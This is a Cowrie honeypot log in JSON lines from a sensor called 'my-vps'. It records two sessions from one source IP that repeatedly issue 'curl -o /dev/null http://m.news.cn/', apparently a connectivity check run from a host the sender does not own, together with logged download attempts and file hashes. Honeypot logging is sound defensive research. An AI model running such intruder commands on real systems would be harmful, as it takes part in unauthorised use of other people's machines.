{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.568316Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.570139Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.581005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.581947Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.584259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.585206Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.607890Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.623118Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.624174Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.625997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.626890Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.628385Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.648979Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.664577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.665804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.669434Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.671144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.672332Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.698769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.709826Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.710888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.712886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.713739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.739733Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.751391Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.754050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.755056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.759058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.760239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.777424Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.778764Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.790462Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.797902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.798954Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.808717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.809875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.818894Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.820346Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.848345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.849420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.857172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.857886Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.859918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.861041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.894997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.896224Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.906928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.908103Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.918791Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.939767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.940993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.943124Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.952436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.953712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.972464Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.985667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.986773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.991668Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.009000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.010462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.020283Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.040822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.042175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.044462Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.058389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.059417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.081083Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.082992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.084465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.087195Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.097027Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.097981Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.129910Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.133078Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.178869Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.231199Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.249892Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.391638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.392676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.402554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.403545Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.450631Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.451861Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.458709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.459824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.475417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.493393Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.494630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.505613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.506831Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.541886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.543112Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.548844Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.555099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.556275Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.581607Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.589051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.590372Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.601511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.602679Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.638396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.640188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.643311Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.649333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.650907Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.677686Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.679724Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.682933Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.684461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.695713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.697239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.722309Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.730649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.731951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.758760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.760222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.769938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.771748Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.793080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.794390Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.820840Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.822593Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.824822Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
